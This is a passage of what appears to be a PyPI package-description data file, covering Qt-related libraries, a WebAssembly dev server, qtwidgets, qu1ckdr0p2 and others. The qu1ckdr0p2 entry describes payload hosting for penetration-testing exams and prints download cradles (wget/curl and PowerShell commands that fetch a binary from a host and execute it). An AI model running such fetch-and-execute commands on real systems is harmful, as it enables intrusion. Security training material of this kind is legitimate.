way,\nthe program can be set back to any point during the tuning. TheHistoryclass\nadditionally saves all relevant information for the evaluation of the performance. 
TheHistoryclass can plot the\ngradients, last fits, control and target parameters.GUIFor real-time plotting of parameters and gradients, the user can couple theHistoryand theAutotunerto the GUI. The GUI automatically stores the program data in the HDF5 library and lets the user start and\nstop the program conveniently. The program can also be ordered to execute only one step at a time. The program is\nlogging its activity and the user can chose how detailed the logging describes the current activity by\nsetting the log level.Naming ConventionVoltagesare used in the Evaluator class to describe the voltages on the gates in the experiment.Positionsare an abstraction of gate voltages in the Gradient and Solver classes. These classes\ncould not only be used for the tuning algorithm but they could be reused in any gradient\nbased solving algorithm.Parameterscorrespond to properties of the physical experiment. They are extracted from the measurement data\nby the Evaluator class and handed over to the ParameterTuner class.Valuesare the abstraction of parameters in the Gradient and Solver classes.Optionsdescribe the measurements in the Measurement class.LicenseCopyright (c) 2017 and later, JARA-FIT Institute for Quantum Information,\nForschungszentrum J\u00c3\u00bclich GmbH and RWTH Aachen University\n\nThis program is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nThis program is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with this program. If not, see ."} +{"package": "qt-unraveling", "pacakge-description": "No description available on PyPI."} +{"package": "qturtle", "pacakge-description": "This is a revamped Qt edition of Python\u2019s turtle graphics.Execute:$ qturtleThis will fire the application. Happy drawing!"} +{"package": "qtutils", "pacakge-description": "qtutilsUtilities for providing concurrent access to Qt objects, simplified QSettings storage,\nand dynamic widget promotion when loading UI files, in Python Qt applications. Includes\nthe Fugue icon set, free to use with attribution to Yusuke Kamiyamane.DocumentationPyPISource code (GitHub)InstallationTo install the latest release version, runpip install qtutils.To install latest development version, clone the GitHub repository and runpip install .to install, orpip install -e .to install in 'editable' mode.Summaryqtutilsis a Python library that provides some convenient features to Python\napplications using the PyQt5/PySide2 widget library.qtutils3.0 dropped support for Python 2.7, PyQt4 and PySide. If you need to use these\nplatforms, you may useqtutils2.3.2 or earlier.qtutilscontains the following components:invoke_in_main: This provides some helper functions to interact with Qt from\nthreads.UiLoader: This provides a simplified means of promoting widgets in*.uifiles to a\ncustom widget of your choice.qsettings_wrapper: A wrapper around QSettings which allows you to access keys of\nQSettings as instance attributes. It also performs automatic type conversions.icons: An icon set as aQResourcefile and corresponding Python module. 
The\nresulting resource file can be used by Qt designer, and the python module imported by\napplications to make the icons available to them. The Fugue icon set was made by\nYusuke Kamiyamane, and is licensed under a Creative Commons Attribution 3.0 License.\nIf you can't or don't want to provide attribution, please purchase a royalty-free\nlicense fromhttp://p.yusukekamiyamane.com/Qt: a PyQt5/PySide2 agnostic interface to Qt that allows you to write software using\nthe PyQt5 API but have it run on either PyQt5 or PySide2.outputbox: aQTextEditwidget for displaying log/output text of an application,\neither by calling methods or by sending data to it overzeromq.Using icons with Qt designerTo use the icons from Qt designer, clone this repository, and point Qt designer to the.qrcfile for the icons set:icons/icons.qrc. Unfortunately Qt desginer saves the\nabsolute path to this file in the resulting.uifile, so if the.uifile is later\nedited by someone on another system, they will see an error at startup saying the.qrcfile cannot be found. This can be ignored and the.uifile will still function\ncorrectly, but Qt designer will need to be told the local path to the.qrcfile before\nit can display the icons within its interface."} +{"package": "qtv", "pacakge-description": "qTVA set of tools to facilitate Timing Verification of SCL circuits."} +{"package": "qtvoila", "pacakge-description": "QtVoilaAQt for Pythonextension forVoila!QtVoilaa Qt for Python (PySide6) widget that controls and renders a Voila application. It's a convenient way of embedding the awesomeness of Voila in your Qt applications.The idea of the widget and implementation details are described in thisblog post.Installation$ pip install qtvoilaUsageQtVoila should be imported and used as a PySide6 widget, anywhere inside your GUI application. Although it can be initialized with default parameters, you are able to define theparent(the PySide6 application), thetemporary directorywhere any created notebooks will be temporarily stored, the path to an existingexternal notebookand the boolean option to either strip code sources on Voila rendering or not:fromqtvoilaimportQtVoilavoila_widget=QtVoila(parent=None,temp_dir=None,external_notebook=None,strip_sources=True)If creating a notebook programmatically, new cells can be added with the methodadd_notebook_cell(). This method accepts three arguments:code_importsis a dictionary of modules to be imported,codeis the string containing the cell's code or markdown text andcell_typedefines if the cell is of type code or markdown. Examples:# Mardown cellmtext=\"#This is my title\\n\"mtext+=\"Here goes some text. Check out this graphic:\"voila_widget.add_notebook_cell(code=mtext,cell_type='markdown')# Code cellimports={'matplotlib':['pyplot'],'numpy':[],}code=\"%matplotlib inline\\n\"code+=\"pyplot.plot(numpy.random.rand(10))\"voila_widget.add_notebook_cell(code_imports=imports,code=code,cell_type='code')To run the Voila process and render the result on widget:voila_widget.run_voila()To clear widget and stop the background Voila process:voila_widget.close_renderer()ExamplesHereyou can find some examples on how to use QtVoila in your PySide6 application. 
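To make these pieces concrete, the calls documented above can be combined into one small self-contained script. Only the QtVoila calls are taken from this documentation; the window and layout setup around them is an illustrative assumption, and the cell contents mirror the snippets shown earlier.

import sys
from PySide6.QtWidgets import QApplication, QMainWindow, QWidget, QVBoxLayout
from qtvoila import QtVoila

app = QApplication(sys.argv)

# Embed the Voila widget like any other Qt widget (window setup is illustrative).
voila_widget = QtVoila(strip_sources=True)
container = QWidget()
layout = QVBoxLayout(container)
layout.addWidget(voila_widget)

window = QMainWindow()
window.setCentralWidget(container)
window.resize(800, 600)
window.show()

# Build a tiny notebook programmatically, then render it with Voila.
voila_widget.add_notebook_cell(code="# Demo\nSome markdown text.", cell_type='markdown')
voila_widget.add_notebook_cell(
    code_imports={'matplotlib': ['pyplot'], 'numpy': []},
    code="%matplotlib inline\npyplot.plot(numpy.random.rand(10))",
    cell_type='code',
)
voila_widget.run_voila()

exit_code = app.exec()
voila_widget.close_renderer()  # stop the background Voila process on exit
sys.exit(exit_code)

Calling close_renderer() at shutdown makes sure the background Voila process does not outlive the GUI.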
For example, creating notebooks from user's input and rendering them:To have your GUI importing existing notebooks and rendering them:"} +{"package": "qtvscodestyle", "pacakge-description": "QtVSCodeStyleVS Code Style for PySide and PyQt.QtVSCodeStyle enables to use VS Code themes in pyqt and pyside.\nThe default and extension themes of VS Code can be used.SCREENSHOTSDark (Visual Studio)Light (Visual Studio)Dark High ContrastNight OwlOne Dark ProAyu Lightetc...RequirementsPython 3.7+PySide6, PyQt6, PyQt5 or PySide2Not tested on linux.Installation MethodLast released versionpip install qtvscodestyleLatest development versionpip install git+https://github.com/5yutan5/QtVSCodeStyleUsageUse default themeTo apply VS Code's default theme, run:importsysfromPySide6.QtWidgetsimportQApplication,QMainWindow,QPushButtonimportqtvscodestyleasqtvscapp=QApplication(sys.argv)main_win=QMainWindow()push_button=QPushButton(\"QtVSCodeStyle!!\")main_win.setCentralWidget(push_button)stylesheet=qtvsc.load_stylesheet(qtvsc.Theme.DARK_VS)# stylesheet = load_stylesheet(qtvsc.Theme.LIGHT_VS)app.setStyleSheet(stylesheet)main_win.show()app.exec()\u26a0 The image quality may be lower on Qt5(PyQt5, PySide2) due to the use of svg. You can add the followingattributeto improve the quality of images.app.setAttribute(Qt.ApplicationAttribute.AA_UseHighDpiPixmaps)Available ThemesTo check available themes, run:qtvsc.list_themes()Theme name Symbol\n___________ ______\n\nLight (Visual Studio): LIGHT_VS\nQuiet Light : QUIET_LIGHT\nSolarized Light : SOLARIZED_LIGHT\nAbyss : ABYSS\nDark (Visual Studio) : DARK_VS\nKimbie Dark : KIMBIE_DARK\nMonokai : MONOKAI\nMonokai Dimmed : MONOKAI_DIMMED\nRed : RED\nSolarized Dark : SOLARIZED_DARK\nTomorrow Night Blue : TOMORROW_NIGHT_BLUE\nDark High Contrast : DARK_HIGH_CONTRASTUse extension themesIf you want to use a third party theme, you will need to download the theme file from the repository and load theme by usingload_stylesheet().Simple example usingOne Dark Pro.One Dark Pro is one of the most used themes for VS Code.First of all, download or copy and pastethe theme file from the repository.Then load the stylesheet using the saved file.theme_file=r\"OneDark-Pro.json\"stylesheet=qtvsc.load_stylesheet(theme_file)app.setStyleSheet(stylesheet)Color customizationThe configuration method is the same asworkbench.colorCustomizationsof VSCode.About color code format, seehttps://code.visualstudio.com/api/references/theme-color#color-formats.# Set the button text color to red.custom_colors={\"button.foreground\":\"#ff0000\"}stylesheet=qtvsc.load_stylesheet(qtvsc.Theme.DARK_VS,custom_colors)To check available color id, run:qtvsc.list_color_id()Color ids is almost the same asVS Code's theme color document. 
Some own color ids like disabled attribute are available.SVG and Font QIcon for VS Code styleYou can also use various icon fonts and svg as QIcon.QtVSCodeStyle identifies icons by symbolic and icon name.The following symbolic are currently available to use:Font Awesome Free(5.15.4)- Font IconFaRegular: Regular styleFaSolid: Solid styleFaBrands: Brands stylevscode-codiconsVsc: VS Code style - SVG IconYou can use icon browser that displays all the available icons.python -m qtvscodestyle.examples.icon_browserTwo functions,theme_icon()andicon()are available.theme_icon()create QIcon will automatically switch the color based on the set color-id when you callload_stylesheet(Another Theme).star_icon=qtvsc.theme_icon(qtvsc.Vsc.STAR_FULL,\"icon.foreground\")button=QToolButton()button.setIcon(star_icon)# star_icon switch to the MONOKAI's \"icon.foreground\" color.qtvsc.load_stylesheet(qtvsc.Theme.MONOKAI)icon()create QIcon with static color.# Set redstar_icon=qtvsc.icon(qtvsc.Vsc.STAR_FULL,\"#FF0000\")button=QToolButton()button.setIcon(star_icon)# Keep red.qtvsc.load_stylesheet(qtvsc.Theme.MONOKAI)Create new themeYou can create your own theme. The configuration method is the same as theme extension of VS Code.\nThe only properties to set are the theme type and colors.Dictionary, json file(json with comment), and string formats are supported.Dictionarycustom_theme={\"type\":\"dark\",# dark or light or hc(high contrast)\"colors\":{\"button.background\":\"#1e1e1e\",\"foreground\":\"#d4d4d4\",\"selection.background\":\"#404040\",},}stylesheet=qtvsc.load_stylesheet(custom_theme)String(Json with comment text)custom_theme=\"\"\"{\"type\": \"dark\",\"colors\": {\"button.background\": \"#1e1e1e\",\"foreground\": \"#d4d4d4\",\"selection.background\": \"#404040\"}}\"\"\"# You need to use loads_stylesheetstylesheet=qtvsc.loads_stylesheet(custom_theme)Json with commentcustom_theme_path=r\"custom_theme.json\"# or you can use pathlib.Path object# custom_theme_path = pathlib.Path(\"custom_theme.json\")stylesheet=qtvsc.load_stylesheet(custom_theme_path)If you customize using json files, you can use json schema.\nCopy json schema fromqvscodestyle/validate_colors.jsonUsing schema example for VS Code:https://code.visualstudio.com/docs/languages/json#_json-schemas-and-settingsCheck common widgetsTo check common widgets, run:python -m qtvscodestyle.examples.widget_galleryCustom propertiesThis module provides several custom properties for applying VS Code's style.For example, if you set theactivitybartotypecustom property of QToolbar, the style of the activitybar will be applied.activitybar=QToolBar()activitybar.setProperty(\"type\",\"activitybar\")WidgetPropertyProperty valueCommand for demoQToolBartypeactivitybarpython -m qtvscodestyle.examples.activitybarQPushButtontypesecondarypython -m qtvscodestyle.examples.pushbuttonQLineEditstatewarning, errorpython -m qtvscodestyle.examples.lineeditQFrametypeh_line, v_linepython -m qtvscodestyle.examples.lineBuild resourcesQtVSCodeStyle creates and deletes icon files dynamically using temporary folder.The style sheet you created will no longer be available after you exit the program.Therefore, QtVSCodeStyle provides the tool to build style sheets with resources that can be used after you exit the program.In order to build style sheets, run:python -m qtvscodestyle.resource_builder --theme dark_vsIt is also possible to apply custom colors.python -m qtvscodestyle.resource_builder -t dark_vs --custom-colors-path custom.json// 
custom.json{\"focusBorder\":\"#ff0000\",\"foreground\":\"#ff00ff\"}In order check details of the command, run:python -m qtvscodestyle.resource_builder --help\u26a0 Resource files and svg folders should always be in the same directory.\u26a0 Not support on PyQt6. PyQt6 removed Qt\u2019s resource system.How to use in Qt DesignerRun theqtvscodestyle.resource_buildercommand and generate resources.Copy the stylesheet text fromstylesheet.qss.Paste the copied stylesheet into stylesheet property of the top-level widget.Register theresource.qrcin generated folder to the resource browser. If you use Qt Creator, addresource.qrcand svg folder to your project.LicenseMIT, seeLICENSE.txt.QtVSCodeStyle incorporates image assets from external sources.\nThe icons for the QtVSCodeStyle are derived from:Font Awesome Free 5.15.4 (Font Awesome; SIL OFL 1.1)Material design icons (Google; Apache License Version 2.0)vscode-codicons (Microsoft Corporation; CC-BY-SA-4.0 License)SeeNOTICE.mdfor full license information.AcknowledgementsThis package has been created with reference to the following repositories.QDarkStyleSheetBreezeStyleSheetsqt-materialvscodeQtAwesomeNapari"} +{"package": "qtwasmserver", "pacakge-description": "Qt for WebAssembly development server.This server is intented to be used while developing and testing WebAssembly applications on a\ntrusted network. It is not suitable for production use cases like distributing applicaitons\nto end users over public networks.The server is an upgrade from the python one line server (\"python -m http.server\"), and offers the\nfollowing features:Zero-configuration / minimal configuration.Support for binding to multiple addresses in addition to localhost. This is useful\nfor e.g. testing on mobile devices on the same local network as the development machine.\nAddress can be addded individually using the --address option. Pass the \"-all\" option to\nbind to all available addresses.Support for generating https certificates using the mkcert utility. Many web features\nrequire a secure context. While \"localhost\" is considered a secure context (also when plain\nhttp is used), other addresses are not. Clicking through the \"not secure\" warnings is\nan option, but using a valid certificate improves flow.Support for compression using brotli. By default, the server compresses when serving over a\npublic, non-localhost address. (localhost is fast, enabling compression here usualually increases\ndownload time instead of doing the opposite). Compression be controlled with the --compress-always and\n--compress-never options.Support for enabling cross-origin isolation mode. This sets the so-called COOP and COEP headers,\nwhich are required to enable SharedArrayBuffer and multithreading. Enable with the --cross-origin-isolation\noption. Note that this may impose additional restrictions on cross-origin requests.TODO:ipv6 supportInstallation and Usagepip install qtwasmserverUsage exmaples:qtwasmserver # Start server on localhost, serve $CWD\nqtwasmserver /path/to/wasm/builds # Specify web root path\nqtwasmserver -p 1080 # Start server(s) on custom port\nqtwasmserver --all-interfaces # Start server(s) on all network interfaces\nqtwasmserver -a 10.0.0.2 # Start server on specific address, in addition to localhost\nqtwasmserver --cross-origin-isolation # Enable cross-origin isolation mode for multithreading\nqtwasmserver -h # Show helpUsing mkcertqtwasmserver can optinally use mkcert to generate https certifacates. 
Seehttps://github.com/FiloSottile/mkcertfor\ninstallation and getting started instructions.The basic flow is:Gereate a certificate authority (CA), and install that on all devices and browsers.\nThis is a one time operation. mkcert will use thuis CA to sign certificates.Generate a certificate for each address you want to use. This is done automatically\nby this server.The beneifit of this appraoch is that certificates can be generated locally, on demand,\nfor each server address in use. This can be useful when for instance moving a development\nmachine between home and office networks."} +{"package": "qtwidgets", "pacakge-description": "Custom Qt5 Python WidgetsQt5 comes with a huge number of widgets built-in, from simple text boxes to digital displays, vector graphics canvas and a full-blown web browser. While you can build perfectly functional applications with the built-in widgets, sometimes your applications will need amore.This repo contains a library ofcustom Python Qt5 widgetswhich are free to use in your own applications. Widgets are compatible with both PyQt5 and PySide2 (Qt for Python). Currently the repository includes -WidgetsLibraryGraphical EqualizerVisualize audio frequency changes with configurable styles and decayfrom qtwidgets import EqualizerBarDocumentationPower BarRotary control with amplitude displayfrom qtwidgets import PowerBarDocumentationPaletteSelect colours from a configurable linear or grid palette.from qtwidgets import PaletteHorizontalfrom qtwidgets import PaletteGridDocumentationLinear Gradient EditorDesign custom linear gradients with multiple stops and colours.from qtwidgets import GradientDocumentationColor ButtonSimple button that displays and selects colours.from qtwidgets import ColorButtonPaintDraw pictures with a custom bitmap canvas, with colour and pen control.from qtwidgets import PaintPassword EditA password line editor with toggleable visibility action.from qtwidgets import PasswordEditReplace checkboxes with this handy toggle widget, with custom colors and optional animationsfrom qtwidgets import Togglefrom qtwidgets import AnimatedToggleDocumentationFor a more detailed introduction to each widget and a walkthrough of their APIsseethe custom widget library on LearnPyQt.More custom widgets will follow,if you have ideas just let me know!Licensed MIT/BSDv2feel free to use in your own projects."} +{"package": "qt-widgets", "pacakge-description": "qt-widgetsReusable Qt widgets library.Browser WidgetAutomatic layout for similar objects.model:List[str]=[f'data{_}'for_inrange(10_000)]browser=BrowserWidget(config=BrowserConfig(item=Item(# width=200,),page=Page(index=4,size=25),),builder=lambdaitem:QPushButton(item),model=model,)Gallery WidgetBased on Browser Widget with auto-resize behavior.defbuilder(path:str):defreader()->numpy.ndarray:returncv2.imread(path)returnreaderwidget=GalleryWidget(images=[builder('image1.jpg'),builder('image2.jpg')],config=BrowserConfig(page=Page(size=20)))Installpip install qt-widgetsRequirementsPyQt5pip install pyqt5\npip install pyqt5-toolsUsageRun any script from thetest folder."} +{"package": "qt_widgetstyler", "pacakge-description": "Inherit WidgetStyler class:from qt_widgetstyler import WidgetStyler\nws = WidgetStyler()Create a new category. 
A category is a logical separation between\ndifferent sections of your program\u2019s widgets, and allows you to easily\napply new or updated stylesheets to one or more categories\nsimultaneously.ws.new_style_category('top_navigation')A custom widget group is created below the category. The custom widget\ngroup is a collection of individual widgets, generally of the same type\n(QLabel, QTableView, etc.), and all individual widget objects assigned\nto this custom widget group will share the same stylesheet.ws.add_custom_widget(category='top_navigation', widget_name='top_navigation_qlabel_text')For this category of our program, we have three QLabel widget objects\nwhich we wish to assign to our custom widget group, QLabel1, QLabel2,\nand QLabel3. We can add them individually, or together in a list.Individually:ws.add_widget(widget_instance=QLabel1, category='top_navigation', widget_name='top_navigation_qlabel_text')Together:ws.add_widgets(widget_instances_list=[QLabel2, QLabel3], category='top_navigation', widget_name='top_navigation_qlabel_text')We now add a StyleSheet to this custom widget group, which will be\nshared by all the widget objects assigned to it. This only stores the\nStyleSheet, it does not yet apply it:ws.add_stylesheet(category='top_navigation', widget_name='top_navigation_qlabel_text', stylesheet='QLabel { color: rgb(0, 0, 0); }')To apply the stylesheets to our widgets, we have three options.We can apply one widget group\u2019s stylesheets individually:ws.apply_stylesheet(category='top_navigation', widget_name='top_navigation_qlabel_text')To all widgets within one category:ws.apply_category_stylesheets(category='top_navigation')Or to all of our widgets in all of our categories:ws.apply_all_stylesheets()To view all of your defined categories:ws.show_categories()To view all of your defined widgets within a single category:ws.show_category_widgets(category='top_navigation')"} +{"package": "qtwirl", "pacakge-description": "qtwirlqtwirl (quick-twirl), one-function interface toAlphaTwirlQuick startJupyter Notebook:Quick start of AlphaTwirl"} +{"package": "qt-wsi-registration", "pacakge-description": "Robust quad-tree based registration on whole slide imagesThis is a library that implements a quad-tree based registration on whole slide images.Core featuresWhole Slide Image supportRobust and fastRigid and non-rigid transformationAdditional RequirementsInstall OpennSlideNotebooksExample notebooks are in the demo folder or.Ho-To:Import package and create Quad-Tree.importqt_wsi_reg.registration_treeasregistrationparameters={# feature extractor parameters\"point_extractor\":\"sift\",#orb , sift\"maxFeatures\":512,\"crossCheck\":False,\"flann\":False,\"ratio\":0.6,\"use_gray\":False,# QTree parameter\"homography\":True,\"filter_outliner\":False,\"debug\":False,\"target_depth\":1,\"run_async\":True,\"num_workers: 2,\"thumbnail_size\":(1024,1024)}qtree=registration.RegistrationQuadTree(source_slide_path=Path(\"examples/4Scanner/Aperio/Cyto/A_BB_563476_1.svs\"),target_slide_path=\"examples/4Scanner/Aperio/Cyto/A_BB_563476_1.svs\",**parameters)Show some registration debug information.qtree.draw_feature_points(num_sub_pic=5,figsize=(10,10))Show annotations on the source and target image in the format:[[\"center_x\", \"center_y\", \"anno_width\", \"anno_height\"]]annos=np.array([[\"center_x\",\"center_y\",\"anno_width\",\"anno_height\"]])qtree.draw_annotations(annos,num_sub_pic=5,figsize=(10,10))Transform 
coordinatesbox=[source_anno.center_x,source_anno.center_y,source_anno.anno_width,source_anno.anno_height]trans_box=qtree.transform_boxes(np.array([box]))[0]"} +{"package": "qtx", "pacakge-description": "## Quantextive AEX API Client#### Dependencies- [**Requests: HTTP for Humans**](http://docs.python-requests.org/en/master/)- install it using **pip**```pythonpip install request```- [**Pandas**](http://pandas.pydata.org/)- install it using **pip**```pythonpip install pandas```#### How to make an API request?class `ApiClient` in [`qtx.py`](qtx.py) is provisioned to make API requests. In the constructor of the `ApiClient` class, a dictionary of default headers for all requests can be supplied so that headers need not be supplied with each request.```pythondefault_headers = { 'x-api-key' : '' }client = ApiClient(default_headers)```To make a GET request, `ApiClient.get()` method is used with following params- **`api_key`**: API key required for authenticating the requests- **`name`**: `string` api name which will be appended to base_url- **`params`**: `dict` of url params**EXAMPLE**```pythonimport qtxapi = \"market-data-eod\"params = {'securityId': 'NSE:NNFM','startDate': '2017-02-08','endDate': '2017-02-10'}api_key = ''client = api_client.ApiClient()print client.get(api_key, api, params).data_frame()```The `get()` method returns a `Response` object from which below methods can be used to get response data as **json** or **Pandas DataFrame**.- `client.get(api_key, name, queryparams).json()` will return response data as **json**, and- `client.get(api_key, name, queryparams).data_frame()` will return response data as pandas **DataFrame**##### Running the test script```pythonpython tests/test.py```"} +{"package": "qtxdbpackages", "pacakge-description": "No description available on PyPI."} +{"package": "qtxmldom", "pacakge-description": "The qtxmldom package provides an API reminiscent of minidom, pxdom and other\nPython-based and Python-related XML toolkits for the qtdom and khtml modules\nprovided respectively by the PyQt and PyKDE packages."} +{"package": "qtxpack", "pacakge-description": "No description available on PyPI."} +{"package": "qty", "pacakge-description": "QtyQtyis a Python library for dealing with physical quantities.InstallationUse the package managerpipto installQty.pip install qtyUsagefromqtyimportEnergy>>>E=Energy()>>>E.meV=1000.>>>E.J1.602176634e-19ContributingPull requests are welcome. For major changes, please open an issue first to discuss what you would like to change.Please make sure to update tests as appropriate.LicenseGNU GPLv3"} +{"package": "qtymetrix", "pacakge-description": "Failed to fetch description. 
HTTP Status Code: 404"} +{"package": "qtymetrixs", "pacakge-description": "No description available on PyPI."} +{"package": "qtypes", "pacakge-description": "qtypesBuild qt graphical user interfaces out of simple type objects.InstallationTODOTypesBoolvalue: boolButtonvalue: None\nbackground_color: str\ntext: str\ntext_color: strEnumvalue: str\nallowed: List[str]Floatvalue: double\nunits: str\nminimum: double\nmaximum: double\ndecimals: intNote that units support works viapintIntegervalue: int\nminimum: int\nmaximum: intStringvalue: strExamplesqtypescomes with a few examples right out of the box.\nRun them using the python module syntax, e.g.:$python-mqtypes.examplesone_of_eachIncluded examples:exampledescriptionone_of_eachSimple example displaying one of each type with some inspection tools.unitsExample demonstrating units support for qtypes Float object."} +{"package": "qtypy", "pacakge-description": "quantipy"} +{"package": "qty-ranges", "pacakge-description": "No description available on PyPI."} +{"package": "qu", "pacakge-description": "Quickly generating unique url of a picture for markdown files.\u2624 QuickstartUpload an image file to qiniu:$ qu up /somewhere/1.png\n$ qu up /somewhere/1.png 2.pngSet configuration of qiniu:$ qu wc --access_key=AK --secret_key=SK --bucket_name=BN --domain_name=DNList local configuration of qiniu:$ qu sc\n$ qu sc --format-type json\u2624 InstallationYou can install \u201cqu\u201d via pip fromPyPI:$ pip install qu\u2624 Usage$ qu --help\nUsage: qu [OPTIONS] COMMAND [ARGS]...\n\n Quickly generating unique url of a picture for markdown files.\n\nOptions:\n --help Show this message and exit.\n\nCommands:\n dc Clear configuration of qiniu.\n sc Show configuration of qiniu.\n up Upload an image to qiniu.\n wc Set configuration of qiniu.\n\n\n$ qu wc --help\nUsage: qu wc [OPTIONS]\n\n Set configuration of qiniu.\n\nOptions:\n -ak, --access_key TEXT qiniu access_key.\n -sk, --secret_key TEXT qiniu secret_key.\n -bn, --bucket_name TEXT qiniu bucket_name.\n -dm, --domain_name TEXT qiniu domain_name.\n --help Show this message and exit.\n\n\n$ qu sc --help\nUsage: qu sc [OPTIONS]\n\n Show configuration of qiniu.\n\nOptions:\n --format-type [json|xml] output format type.\n --help Show this message and exit."} +{"package": "qu1ckdr0p2", "pacakge-description": "AboutRapidly host payloads and post-exploitation bins over HTTP or HTTPS.Designed to be used on exams like OSCP / PNPT or CTFs HTB / etc.Pull requests and issues welcome. As are any contributions.Qu1ckdr0p2 comes with an alias and search feature. The tools are located in thequ1ckdr0p2-toolsrepository. 
By default it will generate a self-signed certificate to use when using the--httpsoption, priority is also given to thetun0interface when the webserver is running, otherwise it will useeth0.Thecommon.inidefines the mapped aliases used within the--search and -uoptions.When the webserver is running there are several download cradles printed to the screen to copy and paste.InstallUsing pip is the only supported way of installingCloning this repository to install will probably break somethingpip3installqu1ckdr0p2\nservinit--updateExport as an alias if neededecho \"alias serv='~/.local/bin/serv'\" >> ~/.zshrc\nsource ~/.zshrcecho \"alias serv='~/.local/bin/serv'\" >> ~/.bashrc\nsource ~/.bashrcUsageServ a single file located in your current working directory$servserve-fimplant.bin--https443$servserve-ffile.example--http8080Update and help$serv--helpUsage:serv[OPTIONS]COMMAND[ARGS]...Welcometoqu1ckdr0p2entrypoint.\n\nOptions:--debugEnabledebugmode.--helpShowthismessageandexit.\n\nCommands:initPerformupdates.serveServefiles.$servserve--help\nUsage:servserve[OPTIONS]Servefiles.\n\nOptions:-l,--listListaliases-s,--searchTEXTSearchqueryforaliases-u,--useINTEGERUseanaliasbyadynamicnumber-f,--fileFILEServeafile--httpINTEGERUseHTTPwithacustomport--httpsINTEGERUseHTTPSwithacustomport-h,--helpShowthismessageandexit.$servinit--helpUsage:servinit[OPTIONS]Performupdates.\n\nOptions:--updateCheckanddownloadmissingtools.--update-selfUpdatethetoolusingpip.--update-self-testUsedfordevtesting,installsunstablebuild.--helpShowthismessageandexit.$servinit--update$servinit--update-selfServ a file from a mapped aliasThe mapped alias numbers for the-uoption are dynamic so you don't have to remember specific numbers or ever type out a tool name.$servserve--searchligolo[\u2192]Path:~/.qu1ckdr0p2/windows/agent.exe[\u2192]Alias:ligolo_agent_win[\u2192]Use:1[\u2192]Path:~/.qu1ckdr0p2/windows/proxy.exe[\u2192]Alias:ligolo_proxy_win[\u2192]Use:2[\u2192]Path:~/.qu1ckdr0p2/linux/agent[\u2192]Alias:ligolo_agent_linux[\u2192]Use:3[\u2192]Path:~/.qu1ckdr0p2/linux/proxy[\u2192]Alias:ligolo_proxy_linux[\u2192]Use:4(...)$servserve--searchligolo-u3--http80[\u2192]Serving:../../.qu1ckdr0p2/linux/agent[\u2192]Protocol:http[\u2192]IPaddress:192.168.1.5[\u2192]Port:80[\u2192]Interface:eth0[\u2192]CTRL+Ctoquit[\u2192]URL:http://192.168.1.5:80/agent[\u2193]csharp:$webclient=New-ObjectSystem.Net.WebClient;$webclient.DownloadFile('http://192.168.1.5:80/agent','c:\\windows\\temp\\agent');Start-Process'c:\\windows\\temp\\agent'[\u2193]wget:\nwgethttp://192.168.1.5:80/agent-O/tmp/agent&&chmod+x/tmp/agent&&/tmp/agent[\u2193]curl:\ncurlhttp://192.168.1.5:80/agent-o/tmp/agent&&chmod+x/tmp/agent&&/tmp/agent[\u2193]powershell:\nInvoke-WebRequest-Urihttp://192.168.1.5:80/agent-OutFilec:\\windows\\temp\\agent;Start-Processc:\\windows\\temp\\agent\n\n\u2827WebserverrunningLicenseMIT"} +{"package": "qu6zhi", "pacakge-description": "\ud83d\udce6 setup.py (for humans)This repo exists to providean example setup.pyfile, that can be used\nto bootstrap your next Python project. It includes some advanced\npatterns and best practices forsetup.py, as well as some\ncommented\u2013out nice\u2013to\u2013haves.For example, thissetup.pyprovides a$ python setup.py uploadcommand, which creates auniversal wheel(andsdist) and uploads\nyour package toPyPiusingTwine, without the need for an annoyingsetup.cfgfile. 
It also creates/uploads a new git tag, automatically.In short,setup.pyfiles can be daunting to approach, when first\nstarting out \u2014 even Guido has been heard saying, \"everyone cargo cults\nthems\". It's true \u2014 so, I want this repo to be the best place to\ncopy\u2013paste from :)Check out the example!Installationcdyour_project# Download the setup.py file:# download with wgetwgethttps://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.py-Osetup.py# download with curlcurl-Ohttps://raw.githubusercontent.com/navdeep-G/setup.py/master/setup.pyTo DoTests via$ setup.py test(if it's concise).Pull requests are encouraged!More ResourcesWhat is setup.py?on Stack OverflowOfficial Python Packaging User GuideThe Hitchhiker's Guide to PackagingCookiecutter template for a Python packageLicenseThis is free and unencumbered software released into the public domain.Anyone is free to copy, modify, publish, use, compile, sell, or\ndistribute this software, either in source code form or as a compiled\nbinary, for any purpose, commercial or non-commercial, and by any means."} +{"package": "qua", "pacakge-description": "QUA SDKPython SDK for QUAPulse level language for controlling a Quantum Computer"} +{"package": "quacc", "pacakge-description": "quacc\u2013 The Quantum Accelerator \ud83e\udd86quaccis a flexible platform for computational materials science \ud83d\udc8e and quantum chemistry \ud83e\uddea that is built for the big data era \ud83d\udd25. It is maintained by theRosen Research Groupat Princeton University.quaccmakes it possible to easily run pre-madecomputational materials science workflowsthat can be efficiently dispatched anywhere: locally, HPC, the cloud, or any combination thereof.quaccgives you the freedom of choice. Through a single, unified interface to several supportedworkflow management solutions, you can use what best suits your unique computing needs.quaccleverages community resources so we don't reinvent the wheel. It is built around the Atomic Simulation Environment and much of the software infrastructure powering the Materials Project.Documentation \ud83d\udcd6Learn More Here!... or skip straight to one of the following sections:\ud83d\udd27Installation Guide\ud83e\udde0User Guide\ud83e\udd1dDeveloper GuideVisual Example \u2728\ud83d\ude80 Representativequaccworkflow usingCovalentas one of the several supported workflow managers.Citation \ud83d\udcddIf you usequaccin your work, please cite it as follows:quacc \u2013 The Quantum Accelerator,https://doi.org/10.5281/zenodo.7720998.License \u2696\ufe0fquaccis released under aBSD 3-Clause license."} +{"package": "quack", "pacakge-description": "UNKNOWN"} +{"package": "quack-cli", "pacakge-description": "Quack CLIA simple CLI for interacting with Quackstack.Usagequack--help"} +{"package": "quackdns", "pacakge-description": "Keeps your DuckDNS IP information updated.Service to providing a basic updater for DuckDNS. Not recommended for production yet."} +{"package": "quacker", "pacakge-description": "QuackerQuackeris a streamlined command-line interface (CLI) tool designed to replicatedbtsourcesas tables from a Cloud DataWarehouseinto a localDuckDBdatabase. 
